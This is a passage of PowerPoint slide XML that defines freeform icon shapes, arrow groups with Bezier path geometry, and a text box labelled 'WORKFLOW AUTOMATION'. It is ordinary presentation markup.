                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr>
                <a:xfrm>
                  <a:off x="-698500" y="3413919"/>
                  <a:ext cx="454025" cy="342900"/>
                  <a:chOff x="-698500" y="3411538"/>
                  <a:chExt cx="454025" cy="342900"/>
                </a:xfrm>
                <a:grpFill/>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="101" name="Freeform 48"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="auto">
                  <a:xfrm>
                    <a:off x="-698500" y="3411538"/>
                    <a:ext cx="454025" cy="287338"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 101 w 126"/>
                      <a:gd name="T1" fmla="*/ 6 h 79"/>
                      <a:gd name="T2" fmla="*/ 111 w 126"/>
                      <a:gd name="T3" fmla="*/ 15 h 79"/>
                      <a:gd name="T4" fmla="*/ 53 w 126"/>
                      <a:gd name="T5" fmla="*/ 44 h 79"/>
                      <a:gd name="T6" fmla="*/ 0 w 126"/>
                      <a:gd name="T7" fmla="*/ 71 h 79"/>
                      <a:gd name="T8" fmla="*/ 0 w 126"/>
                      <a:gd name="T9" fmla="*/ 79 h 79"/>
                      <a:gd name="T10" fmla="*/ 59 w 126"/>
                      <a:gd name="T11" fmla="*/ 50 h 79"/>
                      <a:gd name="T12" fmla="*/ 110 w 126"/>
                      <a:gd name="T13" fmla="*/ 23 h 79"/>
                      <a:gd name="T14" fmla="*/ 101 w 126"/>
                      <a:gd name="T15" fmla="*/ 32 h 79"/>
                      <a:gd name="T16" fmla="*/ 107 w 126"/>
                      <a:gd name="T17" fmla="*/ 38 h 79"/>
                      <a:gd name="T18" fmla="*/ 126 w 126"/>
                      <a:gd name="T19" fmla="*/ 19 h 79"/>
                      <a:gd name="T20" fmla="*/ 107 w 126"/>
                      <a:gd name="T21" fmla="*/ 0 h 79"/>
                      <a:gd name="T22" fmla="*/ 101 w 126"/>
                      <a:gd name="T23"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79">
                        <a:moveTo>
                          <a:pt x="101" y="6"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="111" y="15"/>
                          <a:pt x="111" y="15"/>
                          <a:pt x="111" y="15"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="89" y="16"/>
                          <a:pt x="68" y="26"/>
                          <a:pt x="53" y="44"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="39" y="62"/>
                          <a:pt x="20" y="71"/>
                          <a:pt x="0" y="71"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="79"/>
                          <a:pt x="0" y="79"/>
                          <a:pt x="0" y="79"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="23" y="79"/>
                          <a:pt x="44" y="69"/>
                          <a:pt x="59" y="50"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="73" y="33"/>
                          <a:pt x="91" y="24"/>
                          <a:pt x="110" y="23"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="101" y="32"/>
                          <a:pt x="101" y="32"/>
                          <a:pt x="101" y="32"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="107" y="38"/>
                          <a:pt x="107" y="38"/>
                          <a:pt x="107" y="38"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="126" y="19"/>
                          <a:pt x="126" y="19"/>
                          <a:pt x="126" y="19"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="107" y="0"/>
                          <a:pt x="107" y="0"/>
                          <a:pt x="107" y="0"/>
                        </a:cubicBezTo>
                        <a:lnTo>
                          <a:pt x="101"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49"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="auto">
                  <a:xfrm>
                    <a:off x="-698500" y="3467101"/>
                    <a:ext cx="184150" cy="93663"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 47 w 51"/>
                      <a:gd name="T1" fmla="*/ 24 h 26"/>
                      <a:gd name="T2" fmla="*/ 51 w 51"/>
                      <a:gd name="T3" fmla="*/ 20 h 26"/>
                      <a:gd name="T4" fmla="*/ 0 w 51"/>
                      <a:gd name="T5" fmla="*/ 0 h 26"/>
                      <a:gd name="T6" fmla="*/ 0 w 51"/>
                      <a:gd name="T7" fmla="*/ 8 h 26"/>
                      <a:gd name="T8" fmla="*/ 45 w 51"/>
                      <a:gd name="T9" fmla="*/ 26 h 26"/>
                      <a:gd name="T10" fmla="*/ 47 w 51"/>
                      <a:gd name="T11" fmla="*/ 24 h 26"/>
                    </a:gdLst>
                    <a:ahLst/>
                    <a:cxnLst>
                      <a:cxn ang="0">
                        <a:pos x="T0" y="T1"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="T2" y="T3"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="T4" y="T5"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="T6" y="T7"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="T8" y="T9"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="T10" y="T11"/>
                      </a:cxn>
                    </a:cxnLst>
                    <a:rect l="0" t="0" r="r" b="b"/>
                    <a:pathLst>
                      <a:path w="51" h="26">
                        <a:moveTo>
                          <a:pt x="47" y="24"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="48" y="23"/>
                          <a:pt x="49" y="22"/>
                          <a:pt x="51" y="20"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="36" y="7"/>
                          <a:pt x="19" y="0"/>
                          <a:pt x="0" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="8"/>
                          <a:pt x="0" y="8"/>
                          <a:pt x="0" y="8"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="17" y="8"/>
                          <a:pt x="32" y="14"/>
                          <a:pt x="45" y="26"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="46" y="26"/>
                          <a:pt x="46" y="25"/>
                          <a:pt x="47"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50"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="auto">
                  <a:xfrm>
                    <a:off x="-474663" y="3605213"/>
                    <a:ext cx="230188" cy="149225"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 39 w 64"/>
                      <a:gd name="T1" fmla="*/ 9 h 41"/>
                      <a:gd name="T2" fmla="*/ 48 w 64"/>
                      <a:gd name="T3" fmla="*/ 18 h 41"/>
                      <a:gd name="T4" fmla="*/ 5 w 64"/>
                      <a:gd name="T5" fmla="*/ 0 h 41"/>
                      <a:gd name="T6" fmla="*/ 3 w 64"/>
                      <a:gd name="T7" fmla="*/ 2 h 41"/>
                      <a:gd name="T8" fmla="*/ 0 w 64"/>
                      <a:gd name="T9" fmla="*/ 6 h 41"/>
                      <a:gd name="T10" fmla="*/ 49 w 64"/>
                      <a:gd name="T11" fmla="*/ 26 h 41"/>
                      <a:gd name="T12" fmla="*/ 39 w 64"/>
                      <a:gd name="T13" fmla="*/ 35 h 41"/>
                      <a:gd name="T14" fmla="*/ 45 w 64"/>
                      <a:gd name="T15" fmla="*/ 41 h 41"/>
                      <a:gd name="T16" fmla="*/ 64 w 64"/>
                      <a:gd name="T17" fmla="*/ 22 h 41"/>
                      <a:gd name="T18" fmla="*/ 45 w 64"/>
                      <a:gd name="T19" fmla="*/ 3 h 41"/>
                      <a:gd name="T20" fmla="*/ 39 w 64"/>
                      <a:gd name="T21"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41">
                        <a:moveTo>
                          <a:pt x="39" y="9"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="48" y="18"/>
                          <a:pt x="48" y="18"/>
                          <a:pt x="48" y="18"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="33" y="17"/>
                          <a:pt x="18" y="11"/>
                          <a:pt x="5" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="5" y="0"/>
                          <a:pt x="4" y="1"/>
                          <a:pt x="3" y="2"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2" y="3"/>
                          <a:pt x="1" y="4"/>
                          <a:pt x="0" y="6"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="14" y="18"/>
                          <a:pt x="31" y="26"/>
                          <a:pt x="49" y="26"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="39" y="35"/>
                          <a:pt x="39" y="35"/>
                          <a:pt x="39" y="35"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="45" y="41"/>
                          <a:pt x="45" y="41"/>
                          <a:pt x="45" y="41"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="64" y="22"/>
                          <a:pt x="64" y="22"/>
                          <a:pt x="64" y="22"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="45" y="3"/>
                          <a:pt x="45" y="3"/>
                          <a:pt x="45" y="3"/>
                        </a:cubicBezTo>
                        <a:lnTo>
                          <a:pt x="39"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113" name="Group 112"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm rot="16200000" flipH="1">
                <a:off x="9328282" y="3943550"/>
                <a:ext cx="173836" cy="82296"/>
                <a:chOff x="6032501" y="1510922"/>
                <a:chExt cx="431800" cy="82296"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="114" name="Line 115"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm flipH="1">
                  <a:off x="6032501" y="1552070"/>
                  <a:ext cx="43180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116"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="6364287" y="1510922"/>
                  <a:ext cx="100014" cy="82296"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 63"/>
                    <a:gd name="T1" fmla="*/ 0 h 130"/>
                    <a:gd name="T2" fmla="*/ 63 w 63"/>
                    <a:gd name="T3" fmla="*/ 65 h 130"/>
                    <a:gd name="T4" fmla="*/ 0 w 63"/>
                    <a:gd name="T5" fmla="*/ 130 h 130"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="63" h="130">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="63" y="65"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="130"/>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7" name="Group 116"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm rot="5400000" flipH="1" flipV="1">
                <a:off x="9328282" y="3373389"/>
                <a:ext cx="173836" cy="82296"/>
                <a:chOff x="6032509" y="1510923"/>
                <a:chExt cx="431809" cy="82296"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="118" name="Line 115"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm flipH="1">
                  <a:off x="6032509" y="1552075"/>
                  <a:ext cx="43180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Freeform 116"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="6364302" y="1510923"/>
                  <a:ext cx="100016" cy="82296"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 63"/>
                    <a:gd name="T1" fmla="*/ 0 h 130"/>
                    <a:gd name="T2" fmla="*/ 63 w 63"/>
                    <a:gd name="T3" fmla="*/ 65 h 130"/>
                    <a:gd name="T4" fmla="*/ 0 w 63"/>
                    <a:gd name="T5" fmla="*/ 130 h 130"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="63" h="130">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="63" y="65"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="130"/>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22" name="Freeform 99"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8280641" y="1496967"/>
              <a:ext cx="488999" cy="311750"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 209 w 257"/>
                <a:gd name="T1" fmla="*/ 30 h 162"/>
                <a:gd name="T2" fmla="*/ 199 w 257"/>
                <a:gd name="T3" fmla="*/ 44 h 162"/>
                <a:gd name="T4" fmla="*/ 219 w 257"/>
                <a:gd name="T5" fmla="*/ 59 h 162"/>
                <a:gd name="T6" fmla="*/ 185 w 257"/>
                <a:gd name="T7" fmla="*/ 74 h 162"/>
                <a:gd name="T8" fmla="*/ 171 w 257"/>
                <a:gd name="T9" fmla="*/ 114 h 162"/>
                <a:gd name="T10" fmla="*/ 171 w 257"/>
                <a:gd name="T11" fmla="*/ 115 h 162"/>
                <a:gd name="T12" fmla="*/ 165 w 257"/>
                <a:gd name="T13" fmla="*/ 137 h 162"/>
                <a:gd name="T14" fmla="*/ 153 w 257"/>
                <a:gd name="T15" fmla="*/ 141 h 162"/>
                <a:gd name="T16" fmla="*/ 152 w 257"/>
                <a:gd name="T17" fmla="*/ 142 h 162"/>
                <a:gd name="T18" fmla="*/ 137 w 257"/>
                <a:gd name="T19" fmla="*/ 137 h 162"/>
                <a:gd name="T20" fmla="*/ 129 w 257"/>
                <a:gd name="T21" fmla="*/ 114 h 162"/>
                <a:gd name="T22" fmla="*/ 129 w 257"/>
                <a:gd name="T23" fmla="*/ 42 h 162"/>
                <a:gd name="T24" fmla="*/ 118 w 257"/>
                <a:gd name="T25" fmla="*/ 11 h 162"/>
                <a:gd name="T26" fmla="*/ 92 w 257"/>
                <a:gd name="T27" fmla="*/ 1 h 162"/>
                <a:gd name="T28" fmla="*/ 92 w 257"/>
                <a:gd name="T29" fmla="*/ 1 h 162"/>
                <a:gd name="T30" fmla="*/ 62 w 257"/>
                <a:gd name="T31" fmla="*/ 10 h 162"/>
                <a:gd name="T32" fmla="*/ 50 w 257"/>
                <a:gd name="T33" fmla="*/ 38 h 162"/>
                <a:gd name="T34" fmla="*/ 50 w 257"/>
                <a:gd name="T35" fmla="*/ 66 h 162"/>
                <a:gd name="T36" fmla="*/ 50 w 257"/>
                <a:gd name="T37" fmla="*/ 66 h 162"/>
                <a:gd name="T38" fmla="*/ 50 w 257"/>
                <a:gd name="T39" fmla="*/ 67 h 162"/>
                <a:gd name="T40" fmla="*/ 47 w 257"/>
                <a:gd name="T41" fmla="*/ 76 h 162"/>
                <a:gd name="T42" fmla="*/ 25 w 257"/>
                <a:gd name="T43" fmla="*/ 83 h 162"/>
                <a:gd name="T44" fmla="*/ 0 w 257"/>
                <a:gd name="T45" fmla="*/ 83 h 162"/>
                <a:gd name="T46" fmla="*/ 0 w 257"/>
                <a:gd name="T47" fmla="*/ 103 h 162"/>
                <a:gd name="T48" fmla="*/ 25 w 257"/>
                <a:gd name="T49" fmla="*/ 103 h 162"/>
                <a:gd name="T50" fmla="*/ 62 w 257"/>
                <a:gd name="T51" fmla="*/ 90 h 162"/>
                <a:gd name="T52" fmla="*/ 70 w 257"/>
                <a:gd name="T53" fmla="*/ 66 h 162"/>
                <a:gd name="T54" fmla="*/ 70 w 257"/>
                <a:gd name="T55" fmla="*/ 38 h 162"/>
                <a:gd name="T56" fmla="*/ 76 w 257"/>
                <a:gd name="T57" fmla="*/ 25 h 162"/>
                <a:gd name="T58" fmla="*/ 91 w 257"/>
                <a:gd name="T59" fmla="*/ 21 h 162"/>
                <a:gd name="T60" fmla="*/ 91 w 257"/>
                <a:gd name="T61" fmla="*/ 21 h 162"/>
                <a:gd name="T62" fmla="*/ 92 w 257"/>
                <a:gd name="T63" fmla="*/ 21 h 162"/>
                <a:gd name="T64" fmla="*/ 103 w 257"/>
                <a:gd name="T65" fmla="*/ 25 h 162"/>
                <a:gd name="T66" fmla="*/ 109 w 257"/>
                <a:gd name="T67" fmla="*/ 42 h 162"/>
                <a:gd name="T68" fmla="*/ 109 w 257"/>
                <a:gd name="T69" fmla="*/ 114 h 162"/>
                <a:gd name="T70" fmla="*/ 124 w 257"/>
                <a:gd name="T71" fmla="*/ 153 h 162"/>
                <a:gd name="T72" fmla="*/ 150 w 257"/>
                <a:gd name="T73" fmla="*/ 162 h 162"/>
                <a:gd name="T74" fmla="*/ 155 w 257"/>
                <a:gd name="T75" fmla="*/ 161 h 162"/>
                <a:gd name="T76" fmla="*/ 180 w 257"/>
                <a:gd name="T77" fmla="*/ 150 h 162"/>
                <a:gd name="T78" fmla="*/ 191 w 257"/>
                <a:gd name="T79" fmla="*/ 113 h 162"/>
                <a:gd name="T80" fmla="*/ 200 w 257"/>
                <a:gd name="T81" fmla="*/ 88 h 162"/>
                <a:gd name="T82" fmla="*/ 224 w 257"/>
                <a:gd name="T83" fmla="*/ 78 h 162"/>
                <a:gd name="T84" fmla="*/ 224 w 257"/>
                <a:gd name="T85" fmla="*/ 78 h 162"/>
                <a:gd name="T86" fmla="*/ 225 w 257"/>
                <a:gd name="T87" fmla="*/ 78 h 162"/>
                <a:gd name="T88" fmla="*/ 209 w 257"/>
                <a:gd name="T89" fmla="*/ 101 h 162"/>
                <a:gd name="T90" fmla="*/ 223 w 257"/>
                <a:gd name="T91" fmla="*/ 111 h 162"/>
                <a:gd name="T92" fmla="*/ 257 w 257"/>
                <a:gd name="T93" fmla="*/ 63 h 162"/>
                <a:gd name="T94" fmla="*/ 209 w 257"/>
                <a:gd name="T95" fmla="*/ 3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7" h="162">
                  <a:moveTo>
                    <a:pt x="209" y="30"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="199" y="44"/>
                    <a:pt x="199" y="44"/>
                    <a:pt x="199" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="219" y="59"/>
                    <a:pt x="219" y="59"/>
                    <a:pt x="219" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="212" y="60"/>
                    <a:pt x="197" y="63"/>
                    <a:pt x="185" y="74"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="176" y="84"/>
                    <a:pt x="171" y="97"/>
                    <a:pt x="171" y="114"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="115"/>
                    <a:pt x="171" y="115"/>
                    <a:pt x="171" y="115"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="172" y="118"/>
                    <a:pt x="171" y="130"/>
                    <a:pt x="165" y="137"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="162" y="140"/>
                    <a:pt x="159" y="141"/>
                    <a:pt x="153" y="141"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="152" y="142"/>
                    <a:pt x="152" y="142"/>
                    <a:pt x="152" y="142"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="152" y="142"/>
                    <a:pt x="143" y="143"/>
                    <a:pt x="137" y="137"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="132" y="133"/>
                    <a:pt x="129" y="125"/>
                    <a:pt x="129" y="114"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="129" y="42"/>
                    <a:pt x="129" y="42"/>
                    <a:pt x="129" y="42"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="129" y="40"/>
                    <a:pt x="129" y="23"/>
                    <a:pt x="118" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="111" y="4"/>
                    <a:pt x="102" y="1"/>
                    <a:pt x="92" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="92" y="1"/>
                    <a:pt x="92" y="1"/>
                    <a:pt x="92" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="89" y="0"/>
                    <a:pt x="74" y="0"/>
                    <a:pt x="62" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="15"/>
                    <a:pt x="51" y="23"/>
                    <a:pt x="50" y="38"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="66"/>
                    <a:pt x="50" y="66"/>
                    <a:pt x="50" y="66"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="66"/>
                    <a:pt x="50" y="66"/>
                    <a:pt x="50" y="66"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="67"/>
                    <a:pt x="50" y="67"/>
                    <a:pt x="50" y="67"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="67"/>
                    <a:pt x="51" y="72"/>
                    <a:pt x="47" y="76"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="81"/>
                    <a:pt x="35" y="83"/>
                    <a:pt x="25" y="83"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="83"/>
                    <a:pt x="0" y="83"/>
                    <a:pt x="0" y="83"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="103"/>
                    <a:pt x="0" y="103"/>
                    <a:pt x="0" y="103"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="103"/>
                    <a:pt x="25" y="103"/>
                    <a:pt x="25" y="103"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="103"/>
                    <a:pt x="54" y="98"/>
                    <a:pt x="62" y="90"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="80"/>
                    <a:pt x="70" y="69"/>
                    <a:pt x="70" y="66"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="38"/>
                    <a:pt x="70" y="38"/>
                    <a:pt x="70" y="38"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="33"/>
                    <a:pt x="72" y="28"/>
                    <a:pt x="76" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="20"/>
                    <a:pt x="91" y="21"/>
                    <a:pt x="91" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="91" y="21"/>
                    <a:pt x="91" y="21"/>
                    <a:pt x="91" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="92" y="21"/>
                    <a:pt x="92" y="21"/>
                    <a:pt x="92" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="21"/>
                    <a:pt x="101" y="22"/>
                    <a:pt x="103" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="108" y="30"/>
                    <a:pt x="109" y="39"/>
                    <a:pt x="109" y="42"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="109" y="114"/>
                    <a:pt x="109" y="114"/>
                    <a:pt x="109" y="114"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="109" y="131"/>
                    <a:pt x="114" y="144"/>
                    <a:pt x="124" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="160"/>
                    <a:pt x="144" y="162"/>
                    <a:pt x="150" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="152" y="162"/>
                    <a:pt x="154" y="162"/>
                    <a:pt x="155" y="161"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="165" y="161"/>
                    <a:pt x="174" y="157"/>
                    <a:pt x="180" y="150"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="192" y="137"/>
                    <a:pt x="191" y="117"/>
                    <a:pt x="191" y="113"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="191" y="103"/>
                    <a:pt x="194" y="94"/>
                    <a:pt x="200" y="88"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="209" y="79"/>
                    <a:pt x="224" y="78"/>
                    <a:pt x="224" y="78"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="224" y="78"/>
                    <a:pt x="224" y="78"/>
                    <a:pt x="224" y="78"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="225" y="78"/>
                    <a:pt x="225" y="78"/>
                    <a:pt x="225" y="78"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="209" y="101"/>
                    <a:pt x="209" y="101"/>
                    <a:pt x="209" y="101"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="223" y="111"/>
                    <a:pt x="223" y="111"/>
                    <a:pt x="223" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="257" y="63"/>
                    <a:pt x="257" y="63"/>
                    <a:pt x="257" y="63"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="209" y="30"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="0">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3" name="TextBox 122"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7892648" y="1806258"/>
              <a:ext cx="1258999" cy="586314"/>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WORKFLOW</a:t>
              </a:r>
              <a:b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AUTOMATION</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="133" name="Group 132"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="10800000" flipH="1" flipV="1">
              <a:off x="7983393" y="1611301"/>
              <a:ext cx="173836" cy="83082"/>
              <a:chOff x="6032500" y="3748087"/>
              <a:chExt cx="431800" cy="206375"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="134" name="Line 115"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="6032500" y="3851275"/>
                <a:ext cx="43180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5" name="Freeform 116"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6364287" y="3748087"/>
                <a:ext cx="100013" cy="206375"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 63"/>
                  <a:gd name="T1" fmla="*/ 0 h 130"/>
                  <a:gd name="T2" fmla="*/ 63 w 63"/>
                  <a:gd name="T3" fmla="*/ 65 h 130"/>
                  <a:gd name="T4" fmla="*/ 0 w 63"/>
                  <a:gd name="T5" fmla="*/ 130 h 130"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                </a:cxnLst>
